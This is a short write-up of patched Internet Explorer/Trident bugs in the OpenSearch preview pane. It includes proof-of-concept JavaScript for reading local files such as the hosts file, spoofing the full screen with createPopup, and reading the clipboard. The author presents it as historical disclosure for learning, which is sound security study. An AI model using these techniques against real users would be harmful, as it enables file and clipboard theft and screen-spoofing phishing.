When inside a search result page loaded via an OpenSearch provider with the preview pane enabled, the Trident instance runs with fewer restrictions than a normal web page. This unlocked three capabilities that are normally blocked: reading local files, opening full-screen createPopups, and reading the clipboard.

// Read a local file via an iFrame
function readLocalFile() {
    window.open(document.getElementById("filePath").value, "iFrame");
}
// Example: document.getElementById("filePath").value = "file://localhost/windows/system32/drivers/etc/hosts"

// Spoof the full screen with a createPopup
function spoofScreenCreatePopup() {
    var cp = createPopup();
    cp.show(0, 0, 5000, 5000);
    cp.document.parentWindow.cp = cp;
    cp.document.body.innerHTML = '<h1>FULL SCREEN SPOOFED!</h1>';
}

// Read the clipboard via a modeless dialog
function readClipboard() {
    showModelessDialog("modeless-clipboard.html");
}
// modeless-clipboard.html
alert("Clipboard content:\n\n" + clipboardData.getData("Text"));
window.close();

David Ross pointed to exactly the right location to find these bugs — the OpenSearch preview pane’s Trident zone settings differed from the normal Internet Zone, enabling these otherwise-blocked APIs. Tested on Win8 Fully Patched.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.